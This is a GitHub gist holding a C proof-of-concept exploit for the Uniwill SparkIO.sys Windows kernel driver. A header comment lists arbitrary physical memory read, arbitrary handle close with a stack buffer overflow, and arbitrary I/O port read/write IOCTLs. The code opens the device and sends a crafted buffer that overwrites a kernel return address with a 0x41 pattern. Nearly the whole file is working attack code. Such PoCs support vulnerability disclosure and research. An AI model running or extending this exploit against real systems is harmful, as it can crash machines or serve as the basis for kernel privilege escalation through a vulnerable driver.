Last active
October 7, 2022 17:37
-
-
Save alfarom256/220cb75816ca2b5556e7fc8d8d2803a0 to your computer and use it in GitHub Desktop.
Uniwill SparkIO.sys PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
IOCTL 0x40002004 : Arbitrary Physical Memory Read using MmMapIoSpace | |
IOCTL 0x40002008 : Close a handle of your choice! + Stack-based Buffer Overflow | |
IOCTL 0x40002000 : Arbitrary RW to IO ports | |
*/ | |
#include <Windows.h> | |
#include <stdio.h> | |
#define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); } | |
#define IOCTL_TRIGGER_OVERFLOW 0x40002008 | |
typedef struct BufferOverflow { | |
HANDLE reserved0; | |
DWORD64 reserved1[6]; | |
DWORD64 ROP_RET_1; | |
DWORD64 reserved2[20]; | |
} BufferOverflow, * PBufferOverflow; | |
DWORD64 genPattern(BYTE b) { | |
DWORD64 retVal = b; | |
retVal |= retVal << 8; | |
retVal |= retVal << 16; | |
retVal |= retVal << 32; | |
return retVal; | |
} | |
NTSTATUS triggerOverflow(HANDLE hDevice, PBufferOverflow pOverflowData) { | |
DWORD64 dummy = 0; | |
DWORD dwBytesReturned = 0; | |
NTSTATUS status = DeviceIoControl( | |
hDevice, | |
IOCTL_TRIGGER_OVERFLOW, | |
pOverflowData, | |
sizeof(BufferOverflow), | |
&dummy, | |
sizeof(dummy), | |
&dwBytesReturned, | |
NULL | |
); | |
return status; | |
} | |
int main() { | |
BufferOverflow bo = { 0 }; | |
NTSTATUS status = 0; | |
const char* strDevName = R"(\\.\SparkIO)"; | |
puts("Opening device"); | |
HANDLE hFile = CreateFileA(strDevName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); | |
if (hFile == (HANDLE)0 || hFile == INVALID_HANDLE_VALUE) { | |
GLE("CreateFileA"); | |
return -1; | |
} | |
puts("Opened handle to device"); | |
puts("Triggering buffer overflow... Press any key to continue..."); | |
getchar(); | |
// set the return address to 0x4141414141414141 | |
bo.ROP_RET_1 = genPattern(0x41); | |
status = triggerOverflow(hFile, &bo); | |
if (status) { | |
GLE("Overflow Trigger Failed"); | |
printf("%lx\n", status); | |
return status; | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment